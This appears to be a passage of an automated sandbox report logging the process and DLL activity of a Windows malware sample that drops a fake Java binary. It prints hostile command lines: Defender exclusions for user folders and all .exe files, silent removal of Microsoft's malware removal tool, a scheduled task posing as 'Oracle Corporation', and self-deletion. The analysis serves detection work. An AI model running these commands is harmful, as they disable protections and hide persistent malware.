Source: C:\Users\user\Desktop\sE5IdDeTp2.exe	Process created: C:\Windows\System32\schtasks.exe C:\Windows\system32\schtasks.exe /run /tn "Oracle Corporation"	Jump to behavior
Source: C:\Users\user\Desktop\sE5IdDeTp2.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\sE5IdDeTp2.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\choice.exe choice /C Y /N /D Y /T 3	Jump to behavior
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force	Jump to behavior
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart	Jump to behavior
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Process created: C:\Windows\System32\schtasks.exe C:\Windows\system32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\mlothfmoemid.xml"	Jump to behavior
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\schtasks.exe C:\Windows\System32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\uteugvdfldgq.xml"	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\schtasks.exe C:\Windows\System32\schtasks.exe /run /tn "Oracle Corporation"	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\schtasks.exe C:\Windows\System32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\uteugvdfldgq.xml"	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\schtasks.exe C:\Windows\System32\schtasks.exe /run /tn "Oracle Corporation"	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\schtasks.exe C:\Windows\System32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\uteugvdfldgq.xml"	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\schtasks.exe C:\Windows\System32\schtasks.exe /run /tn "Oracle Corporation"	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\schtasks.exe C:\Windows\System32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\uteugvdfldgq.xml"	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\schtasks.exe C:\Windows\System32\schtasks.exe /run /tn "Oracle Corporation"	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\schtasks.exe C:\Windows\System32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\uteugvdfldgq.xml"	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\schtasks.exe C:\Windows\System32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\uteugvdfldgq.xml"	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\schtasks.exe C:\Windows\System32\schtasks.exe /run /tn "Oracle Corporation"	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\schtasks.exe C:\Windows\system32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\mlothfmoemid.xml"	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: unknown unknown	Jump to behavior
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Process created: C:\Windows\System32\schtasks.exe C:\Windows\system32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\mlothfmoemid.xml"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Process created: C:\Windows\System32\schtasks.exe C:\Windows\system32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\mlothfmoemid.xml"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Process created: C:\Windows\System32\schtasks.exe C:\Windows\system32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\mlothfmoemid.xml"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Process created: C:\Windows\System32\schtasks.exe C:\Windows\system32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\mlothfmoemid.xml"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Process created: C:\Windows\System32\schtasks.exe C:\Windows\system32\schtasks.exe /create /f /tn "Oracle Corporation" /xml "C:\Users\user\AppData\Local\Temp\mlothfmoemid.xml"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart

Source: C:\Users\user\Desktop\sE5IdDeTp2.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wusa.exe	Section loaded: dpx.dll	Jump to behavior
Source: C:\Windows\System32\wusa.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Windows\System32\wusa.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wusa.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wusa.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\choice.exe	Section loaded: version.dll	Jump to behavior
Source: C:\ProgramData\dialer_JavaApps\jre1.8.0_341\bin\dialer_java.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wusa.exe	Section loaded: dpx.dll	Jump to behavior
Source: C:\Windows\System32\wusa.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Windows\System32\wusa.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wusa.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wusa.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
